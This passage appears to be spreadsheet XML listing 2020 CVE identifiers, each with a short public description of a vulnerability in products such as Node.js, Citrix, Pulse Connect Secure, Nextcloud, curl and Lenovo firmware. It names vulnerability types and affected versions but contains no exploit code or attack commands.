    <t>Node.js &lt; 12.18.4 and &lt; 14.11 can be exploited to perform HTTP desync attacks and deliver malicious payloads to unsuspecting users. The payloads can be crafted by an attacker to hijack user sessions, poison cookies, perform clickjacking, and a multitude of other attacks depending on the architecture of the underlying system. The attack was possible due to a bug in processing of carrier-return symbols in the HTTP header names.</t>
  </si>
  <si>
    <t>CVE-2020-8202</t>
  </si>
  <si>
    <t>Improper check of inputs in Nextcloud Preferred Providers app v1.6.0 allowed to perform a denial of service attack when using a very long password.</t>
  </si>
  <si>
    <t>CVE-2020-8203</t>
  </si>
  <si>
    <t>Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.</t>
  </si>
  <si>
    <t>CVE-2020-8204</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability exists in Pulse Connect Secure &lt;9.1R5 on the PSAL Page.</t>
  </si>
  <si>
    <t>CVE-2020-8205</t>
  </si>
  <si>
    <t>The uppy npm package &lt; 1.13.2 and &lt; 2.0.0-alpha.5 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.</t>
  </si>
  <si>
    <t>CVE-2020-8206</t>
  </si>
  <si>
    <t>An improper authentication vulnerability exists in Pulse Connect Secure &lt;9.1RB that allows an attacker with a users primary credentials to bypass the Google TOTP.</t>
  </si>
  <si>
    <t>CVE-2020-8207</t>
  </si>
  <si>
    <t>Improper access control in Citrix Workspace app for Windows 1912 CU1 and 2006.1 causes privilege escalation and code execution when the automatic updater service is running.</t>
  </si>
  <si>
    <t>CVE-2020-8208</t>
  </si>
  <si>
    <t>Improper input validation in Citrix XenMobile Server 10.12 before RP1, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.11 before RP6 and Citrix XenMobile Server before 10.9 RP5 allows Cross-Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-8209</t>
  </si>
  <si>
    <t>Improper access control in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-8210</t>
  </si>
  <si>
    <t>Insufficient protection of secrets in Citrix XenMobile Server 10.12 before RP3, Citrix XenMobile Server 10.11 before RP6, Citrix XenMobile Server 10.10 RP6 and Citrix XenMobile Server before 10.9 RP5 discloses credentials of a service account.</t>
  </si>
  <si>
    <t>CVE-2020-8211</t>
  </si>
  <si>
    <t>Improper input validation in Citrix XenMobile Server 10.12 before RP3, Citrix XenMobile Server 10.11 before RP6, Citrix XenMobile Server 10.10 RP6 and Citrix XenMobile Server before 10.9 RP5 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-8212</t>
  </si>
  <si>
    <t>Improper access control in Citrix XenMobile Server 10.12 before RP3, Citrix XenMobile Server 10.11 before RP6, Citrix XenMobile Server 10.10 RP6 and Citrix XenMobile Server before 10.9 RP5 allows access to privileged functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8213</t>
  </si>
  <si>
    <t>An information exposure vulnerability exists in UniFi Protect before v1.13.4-beta.5 that allowed unauthenticated attackers access to valid usernames for the UniFi Protect web application via HTTP response code and response timing.</t>
  </si>
  <si>
    <t>CVE-2020-8214</t>
  </si>
  <si>
    <t>A path traversal vulnerability in servey version &lt; 3 allows an attacker to read content of any arbitrary file.</t>
  </si>
  <si>
    <t>CVE-2020-8215</t>
  </si>
  <si>
    <t>A buffer overflow is present in canvas version &lt;= 1.6.9, which could lead to a Denial of Service or execution of arbitrary code when it processes a user-provided image.</t>
  </si>
  <si>
    <t>CVE-2020-8216</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in meeting of Pulse Connect Secure &lt;9.1R8 allowed an authenticated end-users to find meeting details, if they know the Meeting ID.</t>
  </si>
  <si>
    <t>CVE-2020-8217</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in Pulse Connect Secure &lt;9.1R8 allowed attackers to exploit in the URL used for Citrix ICA.</t>
  </si>
  <si>
    <t>CVE-2020-8218</t>
  </si>
  <si>
    <t>A code injection vulnerability exists in Pulse Connect Secure &lt;9.1R8 that allows an attacker to crafted a URI to perform an arbitrary code execution via the admin web interface.</t>
  </si>
  <si>
    <t>CVE-2020-8219</t>
  </si>
  <si>
    <t>An insufficient permission check vulnerability exists in Pulse Connect Secure &lt;9.1R8 that allows an attacker to change the password of a full administrator.</t>
  </si>
  <si>
    <t>CVE-2020-8220</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Pulse Connect Secure &lt;9.1R8 that allows an authenticated attacker to perform command injection via the administrator web which can cause DOS.</t>
  </si>
  <si>
    <t>CVE-2020-8221</t>
  </si>
  <si>
    <t>A path traversal vulnerability exists in Pulse Connect Secure &lt;9.1R8 which allows an authenticated attacker to read arbitrary files via the administrator web interface.</t>
  </si>
  <si>
    <t>CVE-2020-8222</t>
  </si>
  <si>
    <t>A path traversal vulnerability exists in Pulse Connect Secure &lt;9.1R8 that allowed an authenticated attacker via the administrator web interface to perform an arbitrary file reading vulnerability through Meeting.</t>
  </si>
  <si>
    <t>CVE-2020-8223</t>
  </si>
  <si>
    <t>A logic error in Nextcloud Server 19.0.0 caused a privilege escalation allowing malicious users to reshare with higher permissions than they got assigned themselves.</t>
  </si>
  <si>
    <t>CVE-2020-8224</t>
  </si>
  <si>
    <t>A code injection in Nextcloud Desktop Client 2.6.4 allowed to load arbitrary code when placing a malicious OpenSSL config into a fixed directory.</t>
  </si>
  <si>
    <t>CVE-2020-8225</t>
  </si>
  <si>
    <t>A cleartext storage of sensitive information in Nextcloud Desktop Client 2.6.4 gave away information about used proxies and their authentication credentials.</t>
  </si>
  <si>
    <t>CVE-2020-8226</t>
  </si>
  <si>
    <t>A vulnerability exists in phpBB &lt;v3.2.10 and &lt;v3.3.1 which allowed remote image dimensions check to be used to SSRF.</t>
  </si>
  <si>
    <t>CVE-2020-8227</t>
  </si>
  <si>
    <t>Missing sanitization of a server response in Nextcloud Desktop Client 2.6.4 for Linux allowed a malicious Nextcloud Server to store files outside of the dedicated sync directory.</t>
  </si>
  <si>
    <t>CVE-2020-8228</t>
  </si>
  <si>
    <t>A missing rate limit in the Preferred Providers app 1.7.0 allowed an attacker to set the password an uncontrolled amount of times.</t>
  </si>
  <si>
    <t>CVE-2020-8229</t>
  </si>
  <si>
    <t>A memory leak in the OCUtil.dll library used by Nextcloud Desktop Client 2.6.4 can lead to a DoS against the host system.</t>
  </si>
  <si>
    <t>CVE-2020-8230</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists in NextCloud Desktop Client v2.6.4 where missing ASLR and DEP protections in for windows allowed to corrupt memory.</t>
  </si>
  <si>
    <t>CVE-2020-8231</t>
  </si>
  <si>
    <t>Due to use of a dangling pointer, libcurl 7.29.0 through 7.71.1 can use the wrong connection when sending data.</t>
  </si>
  <si>
    <t>CVE-2020-8232</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in EdgeMax EdgeSwitch firmware v1.9.0 that allowed read only users could obtain unauthorized information through SNMP community pages.</t>
  </si>
  <si>
    <t>CVE-2020-8233</t>
  </si>
  <si>
    <t>A command injection vulnerability exists in EdgeSwitch firmware &lt;v1.9.0 that allowed an authenticated read-only user to execute arbitrary shell commands over the HTTP interface, allowing them to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8234</t>
  </si>
  <si>
    <t>A vulnerability exists in The EdgeMax EdgeSwitch firmware &lt;v1.9.1 where the EdgeSwitch legacy web interface SIDSSL cookie for admin can be guessed, enabling the attacker to obtain high privileges and get a root shell by a Command injection.</t>
  </si>
  <si>
    <t>CVE-2020-8235</t>
  </si>
  <si>
    <t>Missing access control in Nextcloud Deck 1.0.4 caused an insecure direct object reference allowing an attacker to view all attachments.</t>
  </si>
  <si>
    <t>CVE-2020-8236</t>
  </si>
  <si>
    <t>A wrong configuration in Nextcloud Server 19.0.1 incorrectly made the user feel the passwordless WebAuthn is also a two factor verification by asking for the PIN of the passwordless WebAuthn but not verifying it.</t>
  </si>
  <si>
    <t>CVE-2020-8237</t>
  </si>
  <si>
    <t>Prototype pollution in json-bigint npm package &lt; 1.0.0 may lead to a denial-of-service (DoS) attack.</t>
  </si>
  <si>
    <t>CVE-2020-8238</t>
  </si>
  <si>
    <t>A vulnerability in the authenticated user web interface of Pulse Connect Secure and Pulse Policy Secure &lt; 9.1R8.2 could allow attackers to conduct Cross-Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-8239</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client &lt; 9.1R9 is vulnerable to the client registry privilege escalation attack. This fix also requires Server Side Upgrade due to Standalone Host Checker Client (Windows) and Windows PDC.</t>
  </si>
  <si>
    <t>CVE-2020-8240</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client &lt; 9.1R9 allows a restricted user on an endpoint machine can use system-level privileges if the Embedded Browser is configured with Credential Provider. This vulnerability only affects Windows PDC if the Embedded Browser is configured with the Credential Provider.</t>
  </si>
  <si>
    <t>CVE-2020-8241</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client &lt; 9.1R9 could allow the attacker to perform a MITM Attack if end users are convinced to connect to a malicious server.</t>
  </si>
  <si>
    <t>CVE-2020-8242</t>
  </si>
  <si>
    <t>Unsanitized user input in ExpressionEngine &lt;= 5.4.0 control panel member creation leads to an SQL injection. The user needs member creation/admin control panel access to execute the attack.</t>
  </si>
  <si>
    <t>CVE-2020-8243</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure &lt; 9.1R8.2 admin web interface could allow an authenticated attacker to upload custom template to perform an arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8244</t>
  </si>
  <si>
    <t>A buffer over-read vulnerability exists in bl &lt;4.0.3, &lt;3.0.1, &lt;2.2.1, and &lt;1.2.3 which could allow an attacker to supply user input (even typed) that if it ends up in consume() argument and can become negative, the BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.</t>
  </si>
  <si>
    <t>CVE-2020-8245</t>
  </si>
  <si>
    <t>Improper Input Validation on Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b leads to an HTML Injection attack against the SSL VPN web portal.</t>
  </si>
  <si>
    <t>CVE-2020-8246</t>
  </si>
  <si>
    <t>Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to a denial of service attack originating from the management network.</t>
  </si>
  <si>
    <t>CVE-2020-8247</t>
  </si>
  <si>
    <t>Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to escalation of privileges on the management interface.</t>
  </si>
  <si>
    <t>CVE-2020-8248</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client (Linux) &lt; 9.1R9 could allow local attackers to escalate privilege.</t>
  </si>
  <si>
    <t>CVE-2020-8249</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client (Linux) &lt; 9.1R9 could allow local attackers to perform buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-8250</t>
  </si>
  <si>
    <t>CVE-2020-8251</t>
  </si>
  <si>
    <t>Node.js &lt; 14.11.0 is vulnerable to HTTP denial of service (DoS) attacks based on delayed requests submission which can make the server unable to accept new connections.</t>
  </si>
  <si>
    <t>CVE-2020-8252</t>
  </si>
  <si>
    <t>The implementation of realpath in libuv &lt; 10.22.1, &lt; 12.18.4, and &lt; 14.9.0 used within Node.js incorrectly determined the buffer size which can result in a buffer overflow if the resolved path is longer than 256 bytes.</t>
  </si>
  <si>
    <t>CVE-2020-8253</t>
  </si>
  <si>
    <t>Improper authentication in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 leads to the ability to access sensitive files.</t>
  </si>
  <si>
    <t>CVE-2020-8254</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Secure Desktop Client &lt; 9.1R9 has Remote Code Execution (RCE) if users can be convinced to connect to a malicious server. This vulnerability only affects Windows PDC.To improve the security of connections between Pulse clients and Pulse Connect Secure, see below recommendation(s):Disable Dynamic certificate trust for PDC.</t>
  </si>
  <si>
    <t>CVE-2020-8255</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure &lt; 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary file reading vulnerability is fixed using encrypted URL blacklisting that prevents these messages.</t>
  </si>
  <si>
    <t>CVE-2020-8256</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure &lt; 9.1R8.2 admin web interface could allow an authenticated attacker to gain arbitrary file reading access through Pulse Collaboration via XML External Entity (XXE) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8257</t>
  </si>
  <si>
    <t>Improper privilege management on services run by Citrix Gateway Plug-in for Windows, versions before and including 13.0-61.48 and 12.1-58.15, lead to privilege escalation attacks</t>
  </si>
  <si>
    <t>CVE-2020-8258</t>
  </si>
  <si>
    <t>Improper privilege management on services run by Citrix Gateway Plug-in for Windows, versions before and including 13.0-61.48 and 12.1-58.15, allows an attacker to modify arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-8259</t>
  </si>
  <si>
    <t>Insufficient protection of the server-side encryption keys in Nextcloud Server 19.0.1 allowed an attacker to replace the encryption keys.</t>
  </si>
  <si>
    <t>CVE-2020-8260</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure &lt; 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.</t>
  </si>
  <si>
    <t>CVE-2020-8261</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure / Pulse Policy Secure &lt; 9.1R9 is vulnerable to arbitrary cookie injection.</t>
  </si>
  <si>
    <t>CVE-2020-8262</t>
  </si>
  <si>
    <t>A vulnerability in the Pulse Connect Secure / Pulse Policy Secure below 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) and Open Redirection for authenticated user web interface.</t>
  </si>
  <si>
    <t>CVE-2020-8263</t>
  </si>
  <si>
    <t>A vulnerability in the authenticated user web interface of Pulse Connect Secure &lt; 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) through the CGI file.</t>
  </si>
  <si>
    <t>CVE-2020-8264</t>
  </si>
  <si>
    <t>In actionpack gem &gt;= 6.0.0, a possible XSS vulnerability exists when an application is running in development mode allowing an attacker to send or embed (in another page) a specially crafted URL which can allow the attacker to execute JavaScript in the context of the local application. This vulnerability is in the Actionable Exceptions middleware.</t>
  </si>
  <si>
    <t>CVE-2020-8265</t>
  </si>
  <si>
    <t>Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 are vulnerable to a use-after-free bug in its TLS implementation. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.</t>
  </si>
  <si>
    <t>CVE-2020-8267</t>
  </si>
  <si>
    <t>A security issue was found in UniFi Protect controller v1.14.10 and earlier.The authentication in the UniFi Protect controller API was using “x-token” improperly, allowing attackers to use the API to send authenticated messages without a valid token.This vulnerability was fixed in UniFi Protect v1.14.11 and newer.This issue does not impact UniFi Cloud Key Gen 2 plus.This issue does not impact UDM-Pro customers with UniFi Protect stopped.Affected Products:UDM-Pro firmware 1.7.2 and earlier.UNVR firmware 1.3.12 and earlier.Mitigation:Update UniFi Protect to v1.14.11 or newer version; the UniFi Protect controller can be updated through your UniFi OS settings.Alternatively, you can update UNVR and UDM-Pro to:- UNVR firmware to 1.3.15 or newer.- UDM-Pro firmware to 1.8.0 or newer.</t>
  </si>
  <si>
    <t>CVE-2020-8268</t>
  </si>
  <si>
    <t>Prototype pollution vulnerability in json8-merge-patch npm package &lt; 1.0.3 may allow attackers to inject or modify methods and properties of the global object constructor.</t>
  </si>
  <si>
    <t>CVE-2020-8269</t>
  </si>
  <si>
    <t>An unprivileged Windows user on the VDA can perform arbitrary command execution as SYSTEM in CVAD versions before 2009, 1912 LTSR CU1 hotfixes CTX285870 and CTX286120, 7.15 LTSR CU6 hotfix CTX285344 and 7.6 LTSR CU9</t>
  </si>
  <si>
    <t>CVE-2020-8270</t>
  </si>
  <si>
    <t>An unprivileged Windows user on the VDA or an SMB user can perform arbitrary command execution as SYSTEM in CVAD versions before 2009, 1912 LTSR CU1 hotfixes CTX285871 and CTX285872, 7.15 LTSR CU6 hotfix CTX285341 and CTX285342</t>
  </si>
  <si>
    <t>CVE-2020-8271</t>
  </si>
  <si>
    <t>Unauthenticated remote code execution with root privileges in Citrix SD-WAN Center versions before 11.2.2, 11.1.2b and 10.2.8</t>
  </si>
  <si>
    <t>CVE-2020-8272</t>
  </si>
  <si>
    <t>Authentication Bypass resulting in exposure of SD-WAN functionality in Citrix SD-WAN Center versions before 11.2.2, 11.1.2b and 10.2.8</t>
  </si>
  <si>
    <t>CVE-2020-8273</t>
  </si>
  <si>
    <t>Privilege escalation of an authenticated user to root in Citrix SD-WAN center versions before 11.2.2, 11.1.2b and 10.2.8.</t>
  </si>
  <si>
    <t>CVE-2020-8274</t>
  </si>
  <si>
    <t>Citrix Secure Mail for Android before 20.11.0 suffers from Improper Control of Generation of Code ('Code Injection') by allowing unauthenticated access to read data stored within Secure Mail. Note that a malicious app would need to be installed on the Android device or a threat actor would need to execute arbitrary code on the Android device.</t>
  </si>
  <si>
    <t>CVE-2020-8275</t>
  </si>
  <si>
    <t>Citrix Secure Mail for Android before 20.11.0 suffers from improper access control allowing unauthenticated access to read limited calendar related data stored within Secure Mail. Note that a malicious app would need to be installed on the Android device or a threat actor would need to execute arbitrary code on the Android device.</t>
  </si>
  <si>
    <t>CVE-2020-8276</t>
  </si>
  <si>
    <t>The implementation of Brave Desktop's privacy-preserving analytics system (P3A) between 1.1 and 1.18.35 logged the timestamp of when the user last opened an incognito window, including Tor windows. The intended behavior was to log the timestamp for incognito windows excluding Tor windows. Note that if a user has P3A enabled, the timestamp is not sent to Brave's server, but rather a value from:Used in last 24hUsed in last week but not 24hUsed in last 28 days but not weekEver used but not in last 28 daysNever usedThe privacy risk is low because a local attacker with disk access cannot tell if the timestamp corresponds to a Tor window or a non-Tor incognito window.</t>
  </si>
  <si>
    <t>CVE-2020-8277</t>
  </si>
  <si>
    <t>A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions &lt; 15.2.1, &lt; 14.15.1, and &lt; 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1.</t>
  </si>
  <si>
    <t>CVE-2020-8278</t>
  </si>
  <si>
    <t>Improper access control in Nextcloud Social app version 0.3.1 allowed to read posts of any user.</t>
  </si>
  <si>
    <t>CVE-2020-8279</t>
  </si>
  <si>
    <t>Missing validation of server certificates for out-going connections in Nextcloud Social &lt; 0.4.0 allowed a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-8280</t>
  </si>
  <si>
    <t>A missing file type check in Nextcloud Contacts 3.4.0 allows a malicious user to upload SVG files as PNG files to perform cross-site scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8281</t>
  </si>
  <si>
    <t>A missing file type check in Nextcloud Contacts 3.3.0 allows a malicious user to upload malicious SVG files to perform cross-site scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8282</t>
  </si>
  <si>
    <t>A security issue was found in EdgePower 24V/54V firmware v1.7.0 and earlier where, due to missing CSRF protections, an attacker would have been able to perform unauthorized remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8283</t>
  </si>
  <si>
    <t>An authorised user on a Windows host running Citrix Universal Print Server can perform arbitrary command execution as SYSTEM in CVAD versions before 2009, 1912 LTSR CU1 hotfixes CTX285870 and CTX286120, 7.15 LTSR CU6 hotfix CTX285344 and 7.6 LTSR CU9.</t>
  </si>
  <si>
    <t>CVE-2020-8284</t>
  </si>
  <si>
    <t>A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions.</t>
  </si>
  <si>
    <t>CVE-2020-8285</t>
  </si>
  <si>
    <t>curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing.</t>
  </si>
  <si>
    <t>CVE-2020-8286</t>
  </si>
  <si>
    <t>curl 7.41.0 through 7.73.0 is vulnerable to an improper check for certificate revocation due to insufficient verification of the OCSP response.</t>
  </si>
  <si>
    <t>CVE-2020-8287</t>
  </si>
  <si>
    <t>Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This can lead to HTTP Request Smuggling.</t>
  </si>
  <si>
    <t>CVE-2020-8288</t>
  </si>
  <si>
    <t>The `specializedRendering` function in Rocket.Chat server before 3.9.2 allows a cross-site scripting (XSS) vulnerability by way of the `value` parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8289</t>
  </si>
  <si>
    <t>Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8290</t>
  </si>
  <si>
    <t>Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary.</t>
  </si>
  <si>
    <t>CVE-2020-8291</t>
  </si>
  <si>
    <t>A link preview rendering issue in Rocket.Chat versions before 3.9 could lead to potential XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8292</t>
  </si>
  <si>
    <t>Rocket.Chat server before 3.9.0 is vulnerable to a self cross-site scripting (XSS) vulnerability via the drag &amp; drop functionality in message boxes.</t>
  </si>
  <si>
    <t>CVE-2020-8293</t>
  </si>
  <si>
    <t>A missing input validation in Nextcloud Server before 20.0.2, 19.0.5, 18.0.11 allows users to store unlimited data in workflow rules causing load and potential DDoS on later interactions and usage with those rules.</t>
  </si>
  <si>
    <t>CVE-2020-8294</t>
  </si>
  <si>
    <t>A missing link validation in Nextcloud Server before 20.0.2, 19.0.5, 18.0.11 allows execution of a stored XSS attack using Internet Explorer when saving a 'javascript:' URL in markdown format.</t>
  </si>
  <si>
    <t>CVE-2020-8295</t>
  </si>
  <si>
    <t>A wrong check in Nextcloud Server 19 and prior allowed to perform a denial of service attack when resetting the password for a user.</t>
  </si>
  <si>
    <t>CVE-2020-8296</t>
  </si>
  <si>
    <t>Nextcloud Server prior to 20.0.0 stores passwords in a recoverable format even when external storage is not configured.</t>
  </si>
  <si>
    <t>CVE-2020-8297</t>
  </si>
  <si>
    <t>Nextcloud Deck before 1.0.2 suffers from an insecure direct object reference (IDOR) vulnerability that permits users with a duplicate user identifier to access deck data of a previous deleted user.</t>
  </si>
  <si>
    <t>CVE-2020-8298</t>
  </si>
  <si>
    <t>fs-path node module before 0.0.25 is vulnerable to command injection by way of user-supplied inputs via the `copy`, `copySync`, `remove`, and `removeSync` methods.</t>
  </si>
  <si>
    <t>CVE-2020-8299</t>
  </si>
  <si>
    <t>Citrix ADC and Citrix/NetScaler Gateway 13.0 before 13.0-76.29, 12.1-61.18, 11.1-65.20, Citrix ADC 12.1-FIPS before 12.1-55.238, and Citrix SD-WAN WANOP Edition before 11.4.0, 11.3.2, 11.3.1a, 11.2.3a, 11.1.2c, 10.2.9a suffers from uncontrolled resource consumption by way of a network-based denial-of-service from within the same Layer 2 network segment. Note that the attacker must be in the same Layer 2 network segment as the vulnerable appliance.</t>
  </si>
  <si>
    <t>CVE-2020-8300</t>
  </si>
  <si>
    <t>Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-8315</t>
  </si>
  <si>
    <t>In Python (CPython) 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1, an insecure dependency load upon launch on Windows 7 may result in an attacker's copy of api-ms-win-core-path-l1-1-0.dll being loaded and used instead of the system's copy. Windows 8 and later are unaffected.</t>
  </si>
  <si>
    <t>CVE-2020-8316</t>
  </si>
  <si>
    <t>A vulnerability was reported in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to read files on the system with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8317</t>
  </si>
  <si>
    <t>A DLL search path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8318</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability was reported in the LenovoSystemUpdatePlugin for Lenovo System Interface Foundation prior to version that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8319</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability was reported in Lenovo System Interface Foundation prior to version 1.1.19.3 that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8320</t>
  </si>
  <si>
    <t>An internal shell was included in BIOS image in some ThinkPad models that could allow escalation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-8321</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the System Lock Preinstallation driver in some Lenovo Notebook and ThinkStation models may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8322</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the Legacy USB driver in some Lenovo Notebook and ThinkStation models may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8323</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the Legacy SD driver in some Lenovo ThinkPad, ThinkStation, and Lenovo Notebook models may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8324</t>
  </si>
  <si>
    <t>A vulnerability was reported in LenovoAppScenarioPluginSystem for Lenovo System Interface Foundation prior to version 1.2.184.31 that could allow unsigned DLL files to be executed.</t>
  </si>
  <si>
    <t>CVE-2020-8326</t>
  </si>
  <si>
    <t>An unquoted service path vulnerability was reported in Lenovo Drivers Management prior to version 2.7.1128.1046 that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8327</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability was reported in LenovoBatteryGaugePackage for Lenovo System Interface Foundation bundled in Lenovo Vantage prior to version 10.2003.10.0 that could allow an authenticated user to execute code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8329</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in the firmware prior to version 1.01 used in Lenovo Printer LJ4010DN that could be triggered by a remote user sending a crafted packet to the device, causing an error to be displayed and preventing printer from functioning until the printer is rebooted.</t>
  </si>
  <si>
    <t>CVE-2020-8330</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in the firmware prior to version 1.01 used in Lenovo Printer LJ4010DN that could be triggered by a remote user sending a crafted packet to the device, preventing subsequent print jobs until the printer is rebooted.</t>
  </si>
  <si>
    <t>CVE-2020-8332</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the legacy BIOS mode USB drivers in some legacy Lenovo and IBM System x servers may allow arbitrary code execution. Servers operating in UEFI mode are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-8333</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in the EEPROM driver in some Lenovo Desktops and ThinkStation models may allow arbitrary code execution</t>
  </si>
  <si>
    <t>CVE-2020-8334</t>
  </si>
  <si>
    <t>The BIOS tamper detection mechanism was not triggered in Lenovo ThinkPad T495s, X395, T495, A485, A285, A475, A275 which may allow for unauthorized access.</t>
  </si>
  <si>
    <t>CVE-2020-8335</t>
  </si>
